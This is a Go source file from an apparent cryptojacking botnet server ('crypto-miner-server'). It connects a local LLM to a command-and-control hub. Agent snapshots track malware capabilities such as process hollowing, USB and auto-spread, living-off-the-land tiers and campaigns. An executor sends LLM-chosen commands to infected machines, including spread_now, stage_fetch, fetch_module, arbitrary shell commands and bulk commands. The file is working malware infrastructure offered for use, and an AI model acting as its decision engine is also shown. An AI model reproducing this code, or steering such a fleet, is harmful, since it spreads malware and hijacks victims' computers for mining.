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Operators toggle Logic gates vs AI Control on Settings, refresh local Ollama models, and save ai_endpoint settings via Calibrate PUT; server scheduler and agent snapshot/command paths support stateless 60s fleet decisions.
345 lines
9.6 KiB
Go
345 lines
9.6 KiB
Go
package api
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import (
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"encoding/json"
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"fmt"
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"strings"
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fleetai "crypto-miner-server/internal/ai"
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"crypto-miner-server/internal/models"
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"crypto-miner-server/internal/strategy"
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)
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// FleetAIConfigView is the Calibrate subset for Fleet AI Control.
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type FleetAIConfigView struct {
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AIControlEnabled bool `json:"ai_control_enabled"`
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AIEndpoint string `json:"ai_endpoint"`
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AIModel string `json:"ai_model"`
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AINoContext bool `json:"ai_no_context"`
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AIDecisionIntervalSec int `json:"ai_decision_interval_sec"`
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}
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// FleetAIConfigSource reads/writes Fleet AI settings from server config.
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type FleetAIConfigSource interface {
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GetFleetAIConfig() FleetAIConfigView
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UpdateFleetAIConfig(FleetAIConfigView) error
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}
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// FleetAISnapshot builds agent snapshots from DB + WS hub state.
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func (h *WSHub) FleetAISnapshot(agentID string) (fleetai.AgentSnapshot, bool) {
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if h == nil || h.db == nil || agentID == "" {
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return fleetai.AgentSnapshot{}, false
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}
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agent, err := h.db.GetAgent(agentID)
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if err != nil || agent == nil {
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return fleetai.AgentSnapshot{}, false
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}
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snap := fleetai.AgentSnapshot{
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AgentID: agentID,
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Name: agent.Name,
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Worker: agent.WorkerName,
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Platform: agent.Platform,
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Version: agent.Version,
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BuildID: agent.BuildID,
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GOOS: agent.Platform,
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MiningHashrate: agent.MiningHashrate,
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LOTLTier: agent.LOTLTier,
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JoinLane: agent.JoinLane,
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ChainExhausted: agent.ChainExhausted,
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ChainOrder: append([]string(nil), agent.ChainOrder...),
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ActiveMethod: agent.ActiveMethod,
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VulnRisk: agent.VulnRiskScore,
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}
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for _, a := range agent.LOTLAttempts {
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snap.LOTLAttempts = append(snap.LOTLAttempts, fleetai.TierAttempt{
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Tier: a.Tier, OK: a.OK, Error: a.Error, DurationMs: a.DurationMs,
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})
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}
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h.mu.RLock()
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if caps, ok := h.agentCapabilities[agentID]; ok {
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snap.Capabilities = capabilityFlags(caps)
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}
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if tel, ok := h.agentLiveTelemetry[agentID]; ok {
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mergeTelemetryIntoSnapshot(&snap, tel)
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}
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engine := h.adaptiveEngine
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aiMode := h.serverPolicy.AIControlEnabled
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h.mu.RUnlock()
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snap.SpreadState = describeSpreadState(agent, snap.Capabilities)
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if engine != nil && !aiMode {
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fp := strategy.FingerprintFromAuth(agent.Platform, agent.IP, agent.FirewallDomain != nil && *agent.FirewallDomain)
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adaptive := engine.StrategyForAgent(agentID, fp)
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snap.Adaptive = &adaptive
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if len(adaptive.Reasoning) > 0 {
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snap.AdaptiveSummary = adaptive.Reasoning[0].Action
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}
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}
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return snap, true
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}
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func capabilityFlags(caps models.AgentCapabilities) map[string]bool {
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return map[string]bool{
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"hole_punch": caps.HolePunch,
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"remote_aggressive": caps.RemoteAggressive,
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"auto_spread": caps.AutoSpread,
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"mesh_p2p": caps.MeshP2P,
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"process_hollowing": caps.ProcessHollowing,
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"ai_enabled": caps.AIEnabled,
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"usb_spread": caps.USBSpread,
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}
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}
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func describeSpreadState(agent *models.Agent, caps map[string]bool) string {
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parts := []string{}
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if agent.USBSpread || (caps != nil && caps["usb_spread"]) {
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parts = append(parts, "usb")
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}
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if caps != nil && caps["auto_spread"] {
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parts = append(parts, "auto_spread")
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}
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if agent.JoinLane != "" {
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parts = append(parts, "lane:"+agent.JoinLane)
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}
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if agent.Campaign != "" {
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parts = append(parts, "campaign:"+agent.Campaign)
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}
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if len(parts) == 0 {
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return "idle"
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}
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return strings.Join(parts, ", ")
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}
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func mergeTelemetryIntoSnapshot(snap *fleetai.AgentSnapshot, tel map[string]interface{}) {
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if v, ok := tel["mining_hashrate"].(float64); ok && v > 0 {
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snap.MiningHashrate = v
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}
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if v, ok := tel["lotl_tier"].(string); ok && v != "" {
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snap.LOTLTier = v
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}
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if v, ok := tel["join_lane"].(string); ok && v != "" {
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snap.JoinLane = v
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}
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if v, ok := tel["chain_exhausted"].(bool); ok {
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snap.ChainExhausted = v
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}
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if v, ok := tel["active_method"].(string); ok && v != "" {
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snap.ActiveMethod = v
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}
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if raw, ok := tel["lotl_attempts"]; ok {
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if b, err := json.Marshal(raw); err == nil {
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var attempts []fleetai.TierAttempt
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if json.Unmarshal(b, &attempts) == nil && len(attempts) > 0 {
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snap.LOTLAttempts = attempts
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}
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}
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}
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if raw, ok := tel["chain_order"]; ok {
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if b, err := json.Marshal(raw); err == nil {
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var order []string
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if json.Unmarshal(b, &order) == nil {
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snap.ChainOrder = order
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}
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}
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}
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if v, ok := tel["vuln_risk_score"].(float64); ok {
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n := int(v)
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snap.VulnRisk = &n
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}
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}
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// FleetAIExecutor dispatches parsed LLM commands via existing WS command paths.
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type FleetAIExecutor struct {
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Hub *WSHub
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}
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func (e *FleetAIExecutor) Execute(agentID string, cmd fleetai.Command) (string, error) {
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if e == nil || e.Hub == nil {
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return "", fmt.Errorf("hub unavailable")
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}
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args := cmd.Args
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if args == nil {
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args = map[string]interface{}{}
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}
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switch cmd.Type {
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case fleetai.CmdNoop:
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return "noop", nil
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case fleetai.CmdRestartMining:
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if err := e.Hub.SendAgentCommand(agentID, "restart", nil); err != nil {
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return "", err
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}
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return "restart", nil
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case fleetai.CmdDiscoverAndJoin:
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if err := e.Hub.SendAgentCommand(agentID, "discover_and_join", args); err != nil {
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return "", err
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}
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return "discover_and_join", nil
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case fleetai.CmdSpreadNow:
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if err := e.Hub.SendAgentCommand(agentID, "spread_now", args); err != nil {
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return "", err
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}
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return "spread_now", nil
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case fleetai.CmdStageFetch:
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if err := e.Hub.SendAgentCommand(agentID, "stage_fetch", args); err != nil {
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return "", err
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}
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return "stage_fetch", nil
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case fleetai.CmdSetAgentVersion:
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module, _ := args["module"].(string)
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if module == "" {
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module, _ = args["build_id"].(string)
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}
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if module == "" {
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return "", fmt.Errorf("set_agent_version requires module or build_id")
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}
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if err := e.Hub.SendAgentCommand(agentID, "fetch_module", map[string]interface{}{"module": module}); err != nil {
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return "", err
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}
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return "fetch_module:" + module, nil
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case fleetai.CmdReorderTiers:
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return e.pushReorderTiers(agentID, args)
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case fleetai.CmdBulkCommand:
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return e.runBulkCommand(args)
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case fleetai.CmdAgentCommand:
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action, _ := args["action"].(string)
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if action == "" {
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return "", fmt.Errorf("agent_command requires action")
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}
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sendArgs := map[string]interface{}{}
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for _, k := range []string{"command", "path", "data", "tail_lines"} {
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if v, ok := args[k]; ok {
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sendArgs[k] = v
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}
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}
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if err := e.Hub.SendAgentCommand(agentID, action, sendArgs); err != nil {
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return "", err
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}
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return action, nil
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default:
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if err := e.Hub.SendAgentCommand(agentID, cmd.Type, args); err != nil {
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return "", err
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}
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return cmd.Type, nil
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}
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}
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func (e *FleetAIExecutor) pushReorderTiers(agentID string, args map[string]interface{}) (string, error) {
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payload := map[string]interface{}{}
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if raw, ok := args["tier_order"]; ok {
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payload["tier_order"] = raw
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}
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if raw, ok := args["skip_tiers"]; ok {
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payload["skip_tiers"] = raw
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}
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if len(payload) == 0 {
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return "", fmt.Errorf("reorder_tiers requires tier_order")
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}
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body, _ := json.Marshal(payload)
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if err := e.Hub.SendToAgent(agentID, Message{Type: "adaptive_strategy_update", Payload: body}); err != nil {
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return "", err
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}
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return "reorder_tiers", nil
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}
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func (e *FleetAIExecutor) runBulkCommand(args map[string]interface{}) (string, error) {
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action, _ := args["action"].(string)
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if action == "" {
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return "", fmt.Errorf("bulk_command requires action")
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}
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ids := e.Hub.ResolveAgentTargets(parseAgentIDs(args["agent_ids"]))
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if len(ids) == 0 {
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return "", fmt.Errorf("bulk_command: no agent_ids")
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}
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sendArgs := map[string]interface{}{}
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if v, ok := args["command"]; ok {
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sendArgs["command"] = v
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}
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sent := 0
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for _, id := range ids {
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if err := e.Hub.SendAgentCommand(id, action, sendArgs); err == nil {
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sent++
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}
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}
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return fmt.Sprintf("bulk:%d/%d", sent, len(ids)), nil
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}
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func parseAgentIDs(raw interface{}) []string {
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switch v := raw.(type) {
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case []interface{}:
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out := make([]string, 0, len(v))
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for _, item := range v {
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if s, ok := item.(string); ok && strings.TrimSpace(s) != "" {
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out = append(out, strings.TrimSpace(s))
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}
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}
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return out
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case []string:
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return v
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case string:
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if strings.TrimSpace(v) == "" {
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return nil
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}
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return strings.Split(v, ",")
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default:
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return nil
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}
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}
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// WSHubSnapshotAdapter implements fleetai.SnapshotProvider.
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type WSHubSnapshotAdapter struct{ Hub *WSHub }
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func (a *WSHubSnapshotAdapter) ConnectedAgentIDs() []string {
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if a == nil || a.Hub == nil {
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return nil
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}
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return a.Hub.ConnectedAgentIDs()
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}
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func (a *WSHubSnapshotAdapter) AgentSnapshot(agentID string) (fleetai.AgentSnapshot, bool) {
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if a == nil || a.Hub == nil {
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return fleetai.AgentSnapshot{}, false
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}
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return a.Hub.FleetAISnapshot(agentID)
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}
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// ConfigAIAdapter wraps FleetAIConfigSource for the scheduler.
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type ConfigAIAdapter struct{ Src FleetAIConfigSource }
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func (a *ConfigAIAdapter) AIConfig() fleetai.Config {
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if a == nil || a.Src == nil {
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return fleetai.Config{}
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}
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v := a.Src.GetFleetAIConfig()
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interval := v.AIDecisionIntervalSec
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if interval <= 0 {
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interval = 60
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}
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endpoint := strings.TrimSpace(v.AIEndpoint)
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if endpoint == "" {
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endpoint = "http://127.0.0.1:11434/v1"
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}
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return fleetai.Config{
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Enabled: v.AIControlEnabled,
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Endpoint: endpoint,
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Model: strings.TrimSpace(v.AIModel),
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NoContext: v.AINoContext,
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IntervalSec: interval,
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}
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}
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// DatabaseAIDecisionStore wraps db for InsertAIDecision.
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type DatabaseAIDecisionStore struct {
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DB interface {
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InsertAIDecision(agentID, promptHash, response, commandsExecuted string) error
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}
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}
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func (s *DatabaseAIDecisionStore) InsertAIDecision(agentID, promptHash, response, commandsExecuted string) error {
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if s == nil || s.DB == nil {
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return nil
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}
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return s.DB.InsertAIDecision(agentID, promptHash, response, commandsExecuted)
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}
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